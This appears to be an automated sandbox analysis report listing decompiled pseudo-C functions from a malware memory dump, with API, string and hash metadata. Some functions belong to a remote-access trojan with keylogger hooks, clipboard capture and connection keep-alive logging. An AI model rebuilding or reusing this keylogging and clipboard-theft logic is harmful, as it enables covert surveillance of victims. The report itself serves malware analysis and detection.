                                                                                                				signed short* _v20;
                                                                                                				void* _v24;
                                                                                                				long _v28;
                                                                                                				intOrPtr _t73;
                                                                                                				signed short* _t74;
                                                                                                				signed short* _t76;
                                                                                                				signed char _t77;
                                                                                                				signed short _t83;
                                                                                                				signed short _t85;
                                                                                                				void* _t87;
                                                                                                				signed short _t88;
                                                                                                				void* _t92;
                                                                                                				signed short* _t93;
                                                                                                				signed int _t95;
                                                                                                				signed int _t96;
                                                                                                				signed int _t97;
                                                                                                				intOrPtr _t98;
                                                                                                				signed int _t100;
                                                                                                				signed short _t101;
                                                                                                				signed short* _t104;
                                                                                                				void* _t105;
                                                                                                				char _t106;
                                                                                                				char _t107;
                                                                                                				void* _t108;
                                                                                                				signed short _t109;
                                                                                                				signed int _t110;
                                                                                                				signed int _t111;
                                                                                                				signed short* _t112;
                                                                                                				void* _t115;
                                                                                                
                                                                                                				_t3 =  &_a12; // 0x447ae1
                                                                                                				_t111 =  *_t3;
                                                                                                				_t95 = _a4 >> 6;
                                                                                                				_t110 = (_a4 & 0x0000003f) * 0x30;
                                                                                                				_v12 = _t95;
                                                                                                				_t73 =  *((intOrPtr*)(0x46d800 + _t95 * 4));
                                                                                                				_t92 = 0xa;
                                                                                                				_v24 =  *((intOrPtr*)(_t73 + _t110 + 0x18));
                                                                                                				_t104 = _a8;
                                                                                                				if(_t111 == 0 ||  *_t104 != _t92) {
                                                                                                					 *(_t73 + _t110 + 0x28) =  *(_t73 + _t110 + 0x28) & 0x000000fb;
                                                                                                				} else {
                                                                                                					 *(_t73 + _t110 + 0x28) =  *(_t73 + _t110 + 0x28) | 0x00000004;
                                                                                                				}
                                                                                                				_t74 =  &(_t104[_t111]);
                                                                                                				_t93 = _t104;
                                                                                                				_v20 = _t74;
                                                                                                				_t112 = _t104;
                                                                                                				if(_t104 >= _t74) {
                                                                                                					L31:
                                                                                                					return _t112 - _t104 & 0xfffffffe;
                                                                                                				} else {
                                                                                                					_t76 =  &(_t104[1]);
                                                                                                					while(1) {
                                                                                                						_t96 =  *_t93 & 0x0000ffff;
                                                                                                						_v16 = _t96;
                                                                                                						_t97 = _v12;
                                                                                                						if(_t96 == 0x1a) {
                                                                                                							break;
                                                                                                						}
                                                                                                						_t105 = 0xd;
                                                                                                						_t104 = _a8;
                                                                                                						if(_v16 == _t105) {
                                                                                                							_t28 =  &_v20; // 0x447ae1
                                                                                                							if(_t76 >=  *_t28) {
                                                                                                								_t93 =  &(_t93[1]);
                                                                                                								_v16 =  &(_t76[1]);
                                                                                                								if(ReadFile(_v24,  &_v8, 2,  &_v28, 0) == 0 || _v28 == 0) {
                                                                                                									L23:
                                                                                                									_t83 = 0xd;
                                                                                                									 *_t112 = _t83;
                                                                                                									_t112 =  &(_t112[1]);
                                                                                                								} else {
                                                                                                									_t100 = _v12;
                                                                                                									_t85 = 0xa;
                                                                                                									if(( *( *((intOrPtr*)(0x46d800 + _t100 * 4)) + _t110 + 0x28) & 0x00000048) == 0) {
                                                                                                										if(_v8 != _t85) {
                                                                                                											L22:
                                                                                                											E00446077(_a4, 0xfffffffe, 0xffffffff, 1);
                                                                                                											_t115 = _t115 + 0x10;
                                                                                                											_t87 = 0xa;
                                                                                                											if(_v8 == _t87) {
                                                                                                												L24:
                                                                                                												_t76 = _v16;
                                                                                                												L25:
                                                                                                												_t104 = _a8;
                                                                                                												L26:
                                                                                                												_t62 =  &_v20; // 0x447ae1
                                                                                                												if(_t93 <  *_t62) {
                                                                                                													continue;
                                                                                                												}
                                                                                                												goto L31;
                                                                                                											}
                                                                                                											goto L23;
                                                                                                										}
                                                                                                										_t104 = _a8;
                                                                                                										if(_t112 != _t104) {
                                                                                                											goto L22;
                                                                                                										}
                                                                                                										 *_t112 = _t85;
                                                                                                										_t112 =  &(_t112[1]);
                                                                                                										_t76 = _v16;
                                                                                                										goto L26;
                                                                                                									}
                                                                                                									_t106 = _v8;
                                                                                                									if(_t106 != _t85) {
                                                                                                										_t88 = 0xd;
                                                                                                										 *_t112 = _t88;
                                                                                                										 *((char*)( *((intOrPtr*)(0x46d800 + _t100 * 4)) + _t110 + 0x2a)) = _t106;
                                                                                                										 *((char*)( *((intOrPtr*)(0x46d800 + _t100 * 4)) + _t110 + 0x2b)) = _t106;
                                                                                                										_t107 = 0xa;
                                                                                                										 *((char*)( *((intOrPtr*)(0x46d800 + _t100 * 4)) + _t110 + 0x2c)) = _t107;
                                                                                                									} else {
                                                                                                										 *_t112 = _t85;
                                                                                                									}
                                                                                                								}
                                                                                                								goto L24;
                                                                                                							}
                                                                                                							_t108 = 0xa;
                                                                                                							_t104 = _a8;
                                                                                                							if( *_t76 != _t108) {
                                                                                                								_t109 = 0xd;
                                                                                                								 *_t112 = _t109;
                                                                                                								_t93 =  &(_t93[1]);
                                                                                                								_t112 =  &(_t112[1]);
                                                                                                								_t76 =  &(_t76[1]);
                                                                                                								goto L25;
                                                                                                							}
                                                                                                							_t101 = 0xa;
                                                                                                							_t93 =  &(_t93[2]);
                                                                                                							 *_t112 = _t101;
                                                                                                							_t76 =  &(_t76[2]);
                                                                                                							_t112 =  &(_t112[1]);
                                                                                                							goto L26;
                                                                                                						}
                                                                                                						_t93 =  &(_t93[1]);
                                                                                                						 *_t112 = _v16;
                                                                                                						_t112 =  &(_t112[1]);
                                                                                                						_t76 =  &(_t76[1]);
                                                                                                						goto L26;
                                                                                                					}
                                                                                                					_t98 =  *((intOrPtr*)(0x46d800 + _t97 * 4));
                                                                                                					_t77 =  *(_t98 + _t110 + 0x28);
                                                                                                					if((_t77 & 0x00000040) != 0) {
                                                                                                						 *_t112 =  *_t93;
                                                                                                						_t112 =  &(_t112[1]);
                                                                                                					} else {
                                                                                                						 *(_t98 + _t110 + 0x28) = _t77 | 0x00000002;
                                                                                                					}
                                                                                                					goto L31;
                                                                                                				}
                                                                                                			}



































                                                                                                0x00447467
                                                                                                0x00447467
                                                                                                0x0044746a
                                                                                                0x0044746a
                                                                                                0x0044746d
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00447473
                                                                                                0x00000000
                                                                                                0x00447459
                                                                                                0x0044742f
                                                                                                0x00447434
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x00447436
                                                                                                0x00447439
                                                                                                0x0044743c
                                                                                                0x00000000
                                                                                                0x0044743c
                                                                                                0x004473ef
                                                                                                0x004473f6
                                                                                                0x004473ff
                                                                                                0x00447400
                                                                                                0x0044740c
                                                                                                0x00447417
                                                                                                0x00447422
                                                                                                0x00447423
                                                                                                0x004473f8
                                                                                                0x004473f8
                                                                                                0x004473f8
                                                                                                0x004473f6
                                                                                                0x00000000
                                                                                                0x004473cb
                                                                                                0x0044737a
                                                                                                0x0044737e
                                                                                                0x00447381
                                                                                                0x00447399
                                                                                                0x0044739a
                                                                                                0x0044739d
                                                                                                0x004473a0
                                                                                                0x004473a3
                                                                                                0x00000000
                                                                                                0x004473a3
                                                                                                0x00447385
                                                                                                0x00447386
                                                                                                0x00447389
                                                                                                0x0044738c
                                                                                                0x0044738f
                                                                                                0x00000000
                                                                                                0x0044738f
                                                                                                0x00447362
                                                                                                0x00447365
                                                                                                0x00447368
                                                                                                0x0044736b
                                                                                                0x00000000
                                                                                                0x0044736b
                                                                                                0x00447475
                                                                                                0x0044747c
                                                                                                0x00447482
                                                                                                0x0044748f
                                                                                                0x00447492
                                                                                                0x00447484
                                                                                                0x00447486
                                                                                                0x00447486
                                                                                                0x00000000
                                                                                                0x00447482

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: zD$zD
                                                                                                • API String ID: 0-2382888341
                                                                                                • Opcode ID: 84485be1d0154cb3f7a328aeb12e4d10e6027ae6d8aee5d0389b0561e14c76e4
                                                                                                • Instruction ID: a95be68ce260b593dd2f4fc4a9e91d76d59830fe305d2a59e391408ed8c2b3e0
                                                                                                • Opcode Fuzzy Hash: 84485be1d0154cb3f7a328aeb12e4d10e6027ae6d8aee5d0389b0561e14c76e4
                                                                                                • Instruction Fuzzy Hash: 7351EA31E08205EBDB20DF54D882BBABB70FF15310F25815BD9585B3D1E3789982DB99
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 93%
                                                                                                			E0044B007(void* __ecx, signed int _a4, intOrPtr _a8) {
                                                                                                				int _v8;
                                                                                                				void* __esi;
                                                                                                				int _t15;
                                                                                                				int _t16;
                                                                                                				signed int _t17;
                                                                                                				signed int _t23;
                                                                                                				signed int _t25;
                                                                                                				signed int _t26;
                                                                                                				signed int _t27;
                                                                                                				void* _t30;
                                                                                                				void* _t31;
                                                                                                				intOrPtr _t32;
                                                                                                				intOrPtr _t33;
                                                                                                				intOrPtr* _t34;
                                                                                                				intOrPtr* _t36;
                                                                                                
                                                                                                				_push(__ecx);
                                                                                                				_t23 = _a4;
                                                                                                				_push(_t34);
                                                                                                				if(_t23 == 0) {
                                                                                                					L21:
                                                                                                					_t15 = E00443640(_t23, _t34, __eflags, _a8 + 0x250, 0x20001004,  &_v8, 2);
                                                                                                					__eflags = _t15;
                                                                                                					if(_t15 != 0) {
                                                                                                						_t16 = _v8;
                                                                                                						__eflags = _t16;
                                                                                                						if(_t16 == 0) {
                                                                                                							_t16 = GetACP();
                                                                                                						}
                                                                                                						L25:
                                                                                                						return _t16;
                                                                                                					}
                                                                                                					L22:
                                                                                                					_t16 = 0;
                                                                                                					goto L25;
                                                                                                				}
                                                                                                				_t17 = 0;
                                                                                                				if( *_t23 == 0) {
                                                                                                					goto L21;
                                                                                                				}
                                                                                                				_t34 = 0x45b018;
                                                                                                				_t25 = _t23;
                                                                                                				while(1) {
                                                                                                					_t30 =  *_t25;
                                                                                                					if(_t30 !=  *_t34) {
                                                                                                						break;
                                                                                                					}
                                                                                                					if(_t30 == 0) {
                                                                                                						L7:
                                                                                                						_t26 = _t17;
                                                                                                						L9:
                                                                                                						if(_t26 == 0) {
                                                                                                							goto L21;
                                                                                                						}
                                                                                                						_t36 = 0x45b020;
                                                                                                						_t27 = _t23;
                                                                                                						while(1) {
                                                                                                							_t31 =  *_t27;
                                                                                                							if(_t31 !=  *_t36) {
                                                                                                								break;
                                                                                                							}
                                                                                                							if(_t31 == 0) {
                                                                                                								L17:
                                                                                                								_t48 = _t17;
                                                                                                								if(_t17 != 0) {
                                                                                                									_t16 = E004374BA(_t23, _t23);
                                                                                                									goto L25;
                                                                                                								}
                                                                                                								if(E00443640(_t23, _t36, _t48, _a8 + 0x250, 0x2000000b,  &_v8, 2) == 0) {
                                                                                                									goto L22;
                                                                                                								}
                                                                                                								_t16 = _v8;
                                                                                                								goto L25;
                                                                                                							}
                                                                                                							_t32 =  *((intOrPtr*)(_t27 + 2));
                                                                                                							if(_t32 !=  *((intOrPtr*)(_t36 + 2))) {
                                                                                                								break;
                                                                                                							}
                                                                                                							_t27 = _t27 + 4;
                                                                                                							_t36 = _t36 + 4;
                                                                                                							if(_t32 != 0) {
                                                                                                								continue;
                                                                                                							}
                                                                                                							goto L17;
                                                                                                						}
                                                                                                						asm("sbb eax, eax");
                                                                                                						_t17 = _t17 | 0x00000001;
                                                                                                						__eflags = _t17;
                                                                                                						goto L17;
                                                                                                					}
                                                                                                					_t33 =  *((intOrPtr*)(_t25 + 2));
                                                                                                					if(_t33 !=  *((intOrPtr*)(_t34 + 2))) {
                                                                                                						break;
                                                                                                					}
                                                                                                					_t25 = _t25 + 4;
                                                                                                					_t34 = _t34 + 4;
                                                                                                					if(_t33 != 0) {
                                                                                                						continue;
                                                                                                					}
                                                                                                					goto L7;
                                                                                                				}
                                                                                                				asm("sbb edx, edx");
                                                                                                				_t26 = _t25 | 0x00000001;
                                                                                                				__eflags = _t26;
                                                                                                				goto L9;
                                                                                                			}



















                                                                                                APIs
                                                                                                • GetACP.KERNEL32(?,20001004,?,00000002,00000000,00000050,00000050,?,0044B262,?,00000050,?,?,?,?,?), ref: 0044B0E2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: ACP$OCP
                                                                                                • API String ID: 0-711371036
                                                                                                • Opcode ID: 87287e4518d651e2b0692e996bcadc958b29164629db7d0fe50fe0b99ec47450
                                                                                                • Instruction ID: f74176b6a3b1e7380533c4131977c56ace04f99782b8ad3301722c812ef79dfb
                                                                                                • Opcode Fuzzy Hash: 87287e4518d651e2b0692e996bcadc958b29164629db7d0fe50fe0b99ec47450
                                                                                                • Instruction Fuzzy Hash: DD21D362A00200A6FB348E548D01BA7729AEF64B53F568426E929D7300FB3BDE41C3DC
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 96%
                                                                                                			E00409C4A(void* __ecx) {
                                                                                                				char _v28;
                                                                                                				char _v52;
                                                                                                				char _v76;
                                                                                                				char _v100;
                                                                                                				char _v124;
                                                                                                				char _v148;
                                                                                                				void* __ebx;
                                                                                                				void* __esi;
                                                                                                				void* _t23;
                                                                                                				void* _t27;
                                                                                                				void* _t30;
                                                                                                				void* _t78;
                                                                                                				void* _t84;
                                                                                                				void* _t85;
                                                                                                
                                                                                                				_t85 = _t84 - 0x94;
                                                                                                				_t78 = __ecx;
                                                                                                				if( *0x46feb4 >  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x2c])) + 4))) {
                                                                                                					E0042FE69(0x46feb4);
                                                                                                					_t88 =  *0x46feb4 - 0xffffffff;
                                                                                                					if( *0x46feb4 == 0xffffffff) {
                                                                                                						E00401F5F(0x46feb8, 0x46feb8);
                                                                                                						E004301F3(_t88, E0045398B);
                                                                                                						E0042FE2A(0x46feb4, 0x46feb4);
                                                                                                					}
                                                                                                				}
                                                                                                				E00409C0E( &_v28);
                                                                                                				_t23 = E00409EE1(0x46feb8);
                                                                                                				_t89 = _t23;
                                                                                                				if(_t23 == 0) {
                                                                                                					E00409E07(0x46feb8,  &_v28);
                                                                                                					_t27 = E00407647(_t89);
                                                                                                					_t90 = _t27;
                                                                                                					if(_t27 != 0) {
                                                                                                						E00402076(0x46feb8,  &_v76, "\r\n[End of clipboard]\r\n");
                                                                                                						E00402076(0x46feb8,  &_v52, "\r\n[Text copied to clipboard]\r\n");
                                                                                                						_t30 = E00417CCA( &_v148,  &_v76);
                                                                                                						E00403022(_t85 - 0x18, E0040440A(0x46feb8,  &_v100, E00417CCA( &_v124,  &_v52), _t90, 0x46feb8), _t30);
                                                                                                						E00408BB6(_t78);
                                                                                                						E00401EE2();
                                                                                                						E00401EE2();
                                                                                                						E00401EE2();
                                                                                                						E00401FB9();
                                                                                                						E00401FB9();
                                                                                                					}
                                                                                                				}
                                                                                                				return E00401EE2();
                                                                                                			}


















                                                                                                APIs
                                                                                                  • Part of subcall function 004301F3: __onexit.LIBCMT ref: 004301F9
                                                                                                • __Init_thread_footer.LIBCMT ref: 00409C99
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: Init_thread_footer__onexit
                                                                                                • String ID: [End of clipboard]$[Text copied to clipboard]
                                                                                                • API String ID: 1881088180-3686566968
                                                                                                • Opcode ID: 0bc439145bbc196802ef95a3f700bd743084bf2a86e91d41fd63f47b07f7d18e
                                                                                                • Instruction ID: 1364c38e3fb09b917a9efb015deb553e8459f1fb6bf5114896498835f5bcd246
                                                                                                • Opcode Fuzzy Hash: 0bc439145bbc196802ef95a3f700bd743084bf2a86e91d41fd63f47b07f7d18e
                                                                                                • Instruction Fuzzy Hash: 1B21B1319102094ACB04FBA5D8929EEB779AF40308F50053FE502772E3EF796E4A868D
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 85%
                                                                                                			E004050DB(void* __edi, intOrPtr _a4) {
                                                                                                				struct _SYSTEMTIME _v24;
                                                                                                				char _v48;
                                                                                                				void* __ebx;
                                                                                                				void* _t11;
                                                                                                				void* _t17;
                                                                                                				intOrPtr _t36;
                                                                                                				void* _t37;
                                                                                                				void* _t41;
                                                                                                				void* _t42;
                                                                                                				void* _t46;
                                                                                                
                                                                                                				_t35 = __edi;
                                                                                                				if( *0x46e8a4 == 0) {
                                                                                                					__eflags = 0;
                                                                                                					return 0;
                                                                                                				}
                                                                                                				_t36 = _a4;
                                                                                                				if( *0x46daf7 == 0) {
                                                                                                					L7:
                                                                                                					 *0x46e8c0 =  *0x46e8c0 & 0x00000000;
                                                                                                					 *0x46e8c5 = 1;
                                                                                                					 *0x46e8bc = _t36;
                                                                                                					return 1;
                                                                                                				}
                                                                                                				_t45 =  *0x46e8c4;
                                                                                                				_t22 = "Connection KeepAlive  | Enabled | Timeout: ";
                                                                                                				if( *0x46e8c4 != 0) {
                                                                                                					GetLocalTime( &_v24);
                                                                                                					_t17 = E00417C16("Connection KeepAlive  | Enabled | Timeout: ",  &_v48, _t36);
                                                                                                					_t41 = _t37 - 0x18;
                                                                                                					E004053F2("Connection KeepAlive  | Enabled | Timeout: ", _t41, _t22, __edi, _t45, _t17);
                                                                                                					_t42 = _t41 - 0x14;
                                                                                                					E00402076(_t22, _t42, "i");
                                                                                                					E00417670(_t22, __edi);
                                                                                                					_t37 = _t42 + 0x30;
                                                                                                					E00401FB9();
                                                                                                					 *0x46e8c4 = 0;
                                                                                                				}
                                                                                                				_t46 =  *0x46e8bc - _t36; // 0x0
                                                                                                				if(_t46 != 0) {
                                                                                                					_t47 =  *0x46e8c5;
                                                                                                					if( *0x46e8c5 != 0) {
                                                                                                						GetLocalTime( &_v24);
                                                                                                						_t11 = E00417C16(_t22,  &_v48, _t36);
                                                                                                						_t38 = _t37 - 0x18;
                                                                                                						E004053F2(_t22, _t37 - 0x18, _t22, _t35, _t47, _t11);
                                                                                                						E00402076(_t22, _t38 - 0x14, "i");
                                                                                                						E00417670(_t22, _t35);
                                                                                                						E00401FB9();
                                                                                                					}
                                                                                                				}
                                                                                                				goto L7;
                                                                                                			}














                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(?), ref: 00405112
                                                                                                  • Part of subcall function 00417670: GetLocalTime.KERNEL32(00000000), ref: 0041768A
                                                                                                • GetLocalTime.KERNEL32(?), ref: 0040516A
                                                                                                Strings
                                                                                                • Connection KeepAlive | Enabled | Timeout: , xrefs: 00405107
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocalTime
                                                                                                • String ID: Connection KeepAlive | Enabled | Timeout:
                                                                                                • API String ID: 481472006-507513762
                                                                                                • Opcode ID: 44f1f37d1c060b31f0f26a5d337864351b3c0505452c20456e0832844f4a9e15
                                                                                                • Instruction ID: 2602b2401c21fbe244c57813349b61b37179f2c2b79d1ba746838369b61c9f1a
                                                                                                • Opcode Fuzzy Hash: 44f1f37d1c060b31f0f26a5d337864351b3c0505452c20456e0832844f4a9e15
                                                                                                • Instruction Fuzzy Hash: A721C8B5D0424097DB00B7BBD80AB9B77B8AB41344F44407AE841672D3EAB94548CBAB
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 73%
                                                                                                			E00417670(void* __ebx, void* __edi, char _a4, char _a28) {
                                                                                                				char _v28;
                                                                                                				char _v52;
                                                                                                				char _v76;
                                                                                                				char _v100;
                                                                                                				signed short _v102;
                                                                                                				signed short _v104;
                                                                                                				signed short _v106;
                                                                                                				signed short _v108;
                                                                                                				signed int _t57;
                                                                                                				struct _SYSTEMTIME* _t59;
                                                                                                
                                                                                                				_t59 = (_t57 & 0xfffffff8) - 0x70;
                                                                                                				_t61 =  *0x46daf7;
                                                                                                				if( *0x46daf7 != 0) {
                                                                                                					GetLocalTime(_t59);
                                                                                                					_push(_v102 & 0x0000ffff);
                                                                                                					_push(_v104 & 0x0000ffff);
                                                                                                					_push(_v106 & 0x0000ffff);
                                                                                                					E00417604(_t61, E00401F87(E004076BB(__ebx,  &_v100, E00402F85(__ebx,  &_v76, E004076BB(__ebx,  &_v52, E00405416( &_v28, "%02i:%02i:%02i:%03i ", _t61,  &_a4), __edi, _t61, " | "), _t61,  &_a28), __edi, _t61, "\n")), _v108 & 0x0000ffff);
                                                                                                					E00401FB9();
                                                                                                					E00401FB9();
                                                                                                					E00401FB9();
                                                                                                					E00401FB9();
                                                                                                				}
                                                                                                				E00401FB9();
                                                                                                				return E00401FB9();
                                                                                                			}

                                                                                                APIs
                                                                                                • GetLocalTime.KERNEL32(00000000), ref: 0041768A
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocalTime
                                                                                                • String ID: | $%02i:%02i:%02i:%03i
                                                                                                • API String ID: 481472006-2430845779
                                                                                                • Opcode ID: 40ccf8ef75912a95e96b88de4639ce54bbdb0d7273123500cc2e1884c94a5c38
                                                                                                • Instruction ID: da86c98f0a150929a3279e689b1bccf6a35a519cae3d82787e6b7c352cbcb400
                                                                                                • Opcode Fuzzy Hash: 40ccf8ef75912a95e96b88de4639ce54bbdb0d7273123500cc2e1884c94a5c38
                                                                                                • Instruction Fuzzy Hash: D7117FB15082015AC304FBA5D8459ABB3E8AA84709F100A3FF995921E1EF78E948C65A
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 95%
                                                                                                			E0043A314(signed int __eax, char _a4) {
                                                                                                				char _v8;
                                                                                                				void* __ecx;
                                                                                                				char _t17;
                                                                                                				void* _t19;
                                                                                                				void* _t24;
                                                                                                				void* _t26;
                                                                                                				void* _t33;
                                                                                                				signed int _t36;
                                                                                                				intOrPtr _t37;
                                                                                                
                                                                                                				_push(_t26);
                                                                                                				_t1 =  &_a4; // 0x46e268
                                                                                                				_t36 =  *_t1;
                                                                                                				_t33 = _t26;
                                                                                                				if(((__eax | 0xffffffff) / _t36 & 0xfffffffe) >= 2) {
                                                                                                					_t24 = 0;
                                                                                                					_t37 = _t36 + _t36;
                                                                                                					if( *((intOrPtr*)(_t33 + 0x404)) != 0 || _t37 > 0x400) {
                                                                                                						if(_t37 >  *((intOrPtr*)(_t33 + 0x400))) {
                                                                                                							_t17 = E00440C6C(_t26, _t37);
                                                                                                							_v8 = _t17;
                                                                                                							if(_t17 != 0) {
                                                                                                								_t9 =  &_v8; // 0x46e268
                                                                                                								E0043A75C(_t33 + 0x404, _t9);
                                                                                                								_t11 =  &_v8; // 0x46e268
                                                                                                								_t17 =  *_t11;
                                                                                                								_t24 = 1;
                                                                                                								 *((intOrPtr*)(_t33 + 0x400)) = _t37;
                                                                                                							}
                                                                                                							E004414D5(_t17);
                                                                                                							_t19 = _t24;
                                                                                                						} else {
                                                                                                							goto L5;
                                                                                                						}
                                                                                                					} else {
                                                                                                						L5:
                                                                                                						_t19 = 1;
                                                                                                					}
                                                                                                				} else {
                                                                                                					 *((intOrPtr*)(E00438932())) = 0xc;
                                                                                                					_t19 = 0;
                                                                                                				}
                                                                                                				return _t19;
                                                                                                			}

                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID:
                                                                                                • String ID: hF$hFhF
                                                                                                • API String ID: 0-512729024
                                                                                                • Opcode ID: 66db6e9f2f91d930929337a7f6c01fa3e34e12f64a2525744c7eed7bf9c08d5d
                                                                                                • Instruction ID: 444e78fc88a78de49f6eaca8830c099144722b02f6a1bfcd3633db9244d27423
                                                                                                • Opcode Fuzzy Hash: 66db6e9f2f91d930929337a7f6c01fa3e34e12f64a2525744c7eed7bf9c08d5d
                                                                                                • Instruction Fuzzy Hash: B9014072541114E6DB24DA6588415DFF36CEB45330F14531BEE6457140CB3C5C1686DE
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                C-Code - Quality: 82%
                                                                                                			E00409535(void* __ebx, struct HHOOK__** __ecx) {
                                                                                                				char _v28;
                                                                                                				void* __edi;
                                                                                                				struct HHOOK__** _t29;
                                                                                                				void* _t30;
                                                                                                				void* _t31;
                                                                                                
                                                                                                				_t19 = __ebx;
                                                                                                				_t29 = __ecx;
                                                                                                				_t35 =  *((char*)(__ecx + 0x4a));
                                                                                                				if( *((char*)(__ecx + 0x4a)) == 0) {
                                                                                                					__eflags = 0;
                                                                                                					return 0;
                                                                                                				}
                                                                                                				_t28 = "Online Keylogger Stopped";
                                                                                                				E00402076(__ebx,  &_v28, "Online Keylogger Stopped");
                                                                                                				_t31 = _t30 - 0x18;
                                                                                                				E00417CCA(_t31,  &_v28);
                                                                                                				E0040964B(__ebx, _t29, _t35);
                                                                                                				E00401FB9();
                                                                                                				_t32 = _t31 - 0x18;
                                                                                                				E00402076(__ebx, _t31 - 0x18, "Online Keylogger Stopped");
                                                                                                				E00402076(_t19, _t32 - 0x18, "i");
                                                                                                				E00417670(_t19, _t28);
                                                                                                				_t29[0x12] = 0;
                                                                                                				CloseHandle(_t29[0xf]);
                                                                                                				if(_t29[0x12] == 0 &&  *_t29 != 0) {
                                                                                                					UnhookWindowsHookEx( *_t29);
                                                                                                					 *_t29 =  *_t29 & 0x00000000;
                                                                                                				}
                                                                                                				return 1;
                                                                                                			}

                                                                                                APIs
                                                                                                  • Part of subcall function 0040964B: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0046E3B0), ref: 00409659
                                                                                                  • Part of subcall function 0040964B: wsprintfW.USER32 ref: 004096DA
                                                                                                  • Part of subcall function 0040964B: SetEvent.KERNEL32(00000000,00000000), ref: 00409704
                                                                                                  • Part of subcall function 00417670: GetLocalTime.KERNEL32(00000000), ref: 0041768A
                                                                                                • CloseHandle.KERNEL32(?), ref: 00409598
                                                                                                • UnhookWindowsHookEx.USER32 ref: 004095AB
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000004.00000002.700664057.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                                • Associated: 00000004.00000002.700659152.0000000000400000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700865677.0000000000454000.00000002.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700886089.000000000046C000.00000004.00020000.sdmp
                                                                                                • Associated: 00000004.00000002.700963869.0000000000471000.00000002.00020000.sdmp
                                                                                                Yara matches
                                                                                                Similarity
                                                                                                • API ID: LocalTime$CloseEventHandleHookUnhookWindowswsprintf
                                                                                                • String ID: Online Keylogger Stopped
                                                                                                • API String ID: 3650414481-1496645233
                                                                                                • Opcode ID: 92d3fecff6e1796fa177225fae55c0ec1a1a37cc43c5d8ebea1db57b8a37f226
                                                                                                • Instruction ID: 0e82ee7cf6605d8404887f51bf32956e0f1aba4ff1f64d52b3fed64a74b7abab
                                                                                                • Opcode Fuzzy Hash: 92d3fecff6e1796fa177225fae55c0ec1a1a37cc43c5d8ebea1db57b8a37f226
